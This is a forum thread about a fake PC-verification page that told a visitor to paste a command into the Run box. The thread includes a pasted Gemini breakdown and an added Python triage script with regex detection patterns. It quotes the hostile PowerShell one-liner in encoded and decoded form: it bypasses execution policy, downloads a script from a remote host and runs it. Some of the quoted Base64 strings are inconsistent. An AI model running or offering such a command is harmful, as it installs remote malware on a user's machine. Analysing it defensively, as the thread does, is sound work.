this post was submitted on 23 Jun 2025
17 points (90.5% liked)

Windows 11

Yeah, don't put this in, but can anyone give me an idea of what they were trying to do? The website was https:\howchoo.\com\3dprinting\updating-octoprint
and used a real PC verification screen to try to get me to put this in Run:

conhost cmd /c powershell /ep bypass /e JABzAGkAdABlACAAPQAgAEkAbgB2AG8AawBlAC0AUgBlAHMAdABNAGUAdABoAG8AZAAgACcAaAB0AHQAcABzADoALwAvAG0AYQBzAHQAcgBhAHcALgB0AG8AcAAvAG0AZQAvAGQAYQB5ACcAOwAgAGkARQB4ACAAJABzAGREDACTED== /W 1

[–] Pyro@pawb.social 9 points 2 weeks ago* (last edited 2 weeks ago) (18 children)

One of the moments that AI can be good. I asked Google Gemini:

This command is highly malicious and is designed to execute a script downloaded from a remote server. Here's a breakdown of what each part does:

  • `conhost cmd /c`: This part starts a new command prompt window (cmd) and then immediately executes the following command (/c) within it. conhost is a legitimate Windows process, but here it's being used as a wrapper.
  • `powershell /ep bypass /e JABzAGkAdABlACAAPQAgAEkAbgB2AG8AawBlAC0AUgBlAHMAdABNAGUAdABoAG8AZAAgACcAaAB0AHQAcwA6AC8ALwBtAGEAcwB0AHIAYQB3AC4AdABvAHAALwBtAGUvAGQAYQB5ACcAOwAgAGkARQB4ACAAJABzAGkAdABlAA==`: This is the core malicious part.
    • `powershell`: Invokes the PowerShell interpreter.
    • `/ep bypass`: This is crucial. /ep stands for "execution policy." bypass tells PowerShell to bypass its execution policy, meaning it will run any script regardless of the local security settings that might otherwise prevent untrusted scripts from running. This is a common tactic for malware.
    • `/e JABzAGkAdABlACAAPQAgAEkAbgB2AG8AawBlAC0AUgBlAHMAdABNAGUAdABoAG8AZAAgACcAaAB0AHQAcwA6AC8ALwBtAGEAcwB0AHIAYQBhAC4AdABvAHAALwBtAGUvAGQAYQB5ACcAOwAgAGkARQB4ACAAJABzAGkAdABlAA==`: The /e switch indicates that the following string is an encoded command. The string `JABzAGkAdABlACAAPQAgAEkAbgB2AG8AawBlAC0AUgBlAHMAdABNAGUAdABoAG8AZAAgACcAaAB0AHQAcwA6AC8ALwBtAGEAcwB0AHIAYQB3AC4AdABvAHAALwBtAGUvAGQAYQB5ACcAOwAgAGkARQB4ACAAJABzAGkAdABlAA==` is a Base64 encoded string.

Let's decode the Base64 string to see the actual PowerShell command:

Decoded PowerShell command: `$site = Invoke-RestMethod 'https: //mastraw.top/me/day'; iex $site`

Now we can fully understand the malicious intent:

  • `$site = Invoke-RestMethod 'https: //mastraw.top/me/day'`: This command uses Invoke-RestMethod to download content from the URL `https: //mastraw.top/me/day`. This URL is likely hosting a malicious PowerShell script or some other form of executable code.
  • `; iex $site`: The semicolon acts as a command separator. iex is an alias for Invoke-Expression. This command takes the content downloaded from `https: //mastraw.top/me/day` (which is stored in the $site variable) and executes it directly as a PowerShell command.

In summary, this command is designed to:

  • Bypass PowerShell's security restrictions.
  • Download a script from a specific remote website (`https: //mastraw.top/me/day`).
  • Immediately execute that downloaded script on the victim's computer.

The content of the script downloaded from `https: //mastraw.top/me/day` is unknown without accessing that URL, but given the nature of this command, it's almost certainly malicious. It could be anything from a ransomware dropper, a keylogger, a remote access trojan (RAT), or a cryptocurrency miner. If you encountered this on a computer, it is highly compromised and should be immediately isolated from the network and professionally cleaned or reimaged.

Edit: added backticks to URLs
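The comment above decodes the blob by hand (well, by Gemini). As an added example that is not part of the post, here is an offline Python triage helper that does the same decoding (`-EncodedCommand` is Base64 over UTF-16LE, which is why the blob starts with `JAB`) and then flags the traits this one-liner shows, without ever executing it. The sample command line is constructed with a placeholder host, since the OP's blob is redacted.

```python
import base64
import re

# Constructed sample (not the OP's command, whose blob is redacted in the post): the same
# shape of one-liner the thread decodes, with a placeholder host instead of the real one.
SAMPLE_PLAIN = "$site = Invoke-RestMethod 'https://example.invalid/me/day'; iex $site"
SAMPLE_CMDLINE = (
    "conhost cmd /c powershell /ep bypass /e "
    + base64.b64encode(SAMPLE_PLAIN.encode("utf-16-le")).decode("ascii")
    + " /W 1"
)

# powershell.exe accepts both - and / as the parameter prefix and abbreviates -EncodedCommand.
ENCODED_FLAGS = {"-e", "-ec", "-enc", "-encodedcommand", "/e", "/ec", "/enc", "/encodedcommand"}

# Each indicator is checked against the raw command line AND the decoded script.
INDICATORS = {
    "execution_policy_bypass": re.compile(r"[-/](?:ep|ex|exec|executionpolicy)\s+bypass", re.I),
    "encoded_command": re.compile(r"(?:^|\s)[-/](?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", re.I),
    "hidden_window": re.compile(r"[-/](?:w|windowstyle)\s+(?:1|hidden)\b", re.I),  # WindowStyle 1 == Hidden
    "remote_fetch": re.compile(r"\b(?:Invoke-RestMethod|Invoke-WebRequest|irm|iwr|DownloadString)\b", re.I),
    "invoke_expression": re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I),
}
URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.I)


def decode_encoded_command(cmdline):
    """Return the plaintext of an -EncodedCommand blob (Base64 over UTF-16LE), or None."""
    tokens = cmdline.split()
    for flag, blob in zip(tokens, tokens[1:]):
        if flag.lower() in ENCODED_FLAGS:
            try:
                return base64.b64decode(blob, validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None  # malformed or truncated blob: nothing readable to show
    return None


def triage(cmdline):
    """Decode without executing and report which download-and-run traits the command has."""
    decoded = decode_encoded_command(cmdline)
    haystack = cmdline + "\n" + (decoded or "")
    hits = [name for name, rx in INDICATORS.items() if rx.search(haystack)]
    return {"decoded": decoded, "urls": URL_RE.findall(haystack), "indicators": hits}


if __name__ == "__main__":
    report = triage(SAMPLE_CMDLINE)
    print("decoded :", report["decoded"])
    print("urls    :", report["urls"])
    print("flags   :", ", ".join(report["indicators"]))
```

Paste a suspicious `powershell -e ...` line into `triage()` and you get the plaintext plus the URLs to block, which is the part of the analysis that needs no LLM.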

[–] geekwithsoul@lemm.ee 1 points 2 weeks ago (14 children)

You needed an LLM to figure out this was malware?! Sweet Jesus, we're well and truly fucked.

[–] StarvingMartist@sh.itjust.works 1 points 2 weeks ago (6 children)

Chill out, you. We all know it was malware, but LLMs are actually a tool in this use case to find out more about it without executing the code.

I don't like AI any more than the next guy, but this is just a silly response.

[–] geekwithsoul@lemm.ee 1 points 2 weeks ago (2 children)

"Chill out you"

Fucking priceless. The LLM didn't explain anything beyond what was obvious from just looking at it. It was trying to get you to run a privileged executable. The LLM doesn't have a clue what the executable does, and even admits that. So why bother asking it?

Let's take the tech out of it. You're at a restaurant and you're given a beverage in a glass, but you can see the glass is dirty with food residue. Do you have to consult an LLM to know not to drink out of it? Does it matter what sort of food residue it is? Of course not.

I swear people's critical thinking skills are non-existent or in complete atrophy these days. The only thing of potential interest is the executable itself and if you're posting this question, I'm not sure any explanation or details would mean anything to you.

[–] StarvingMartist@sh.itjust.works 2 points 2 weeks ago (1 children)

Yeah but the LLM isn't the one making a scene

[–] geekwithsoul@lemm.ee 0 points 2 weeks ago (1 children)

Making a scene?! Oh no! Have I shattered the fragile Lemmy decorum with my boorish behavior? How dreadful!

Listen, if you want to believe an LLM has anything useful to say about the malware you're presented with on dodgy sites, go for it.

And I'll be free to think you're a prime example for why we should start requiring a "drivers license" to get on a computer. To each their own.

[–] deleted@lemmy.world 2 points 2 weeks ago (1 children)

Not everyone can understand that it runs a privileged executable.

[–] geekwithsoul@lemm.ee 1 points 2 weeks ago

If it's malware, it - by definition - is going to need to run a privileged executable. That's the "ware" in "malware". The LLM is just explaining the specific method they're attempting to use - which again should be obvious both by the nature of the actions it's requesting from the user as well as the specific text it's asking to be run. It explicitly says it doesn't know anything about the executable that's being run, so it really isn't offering anything particularly useful or actionable - just wasting resources.
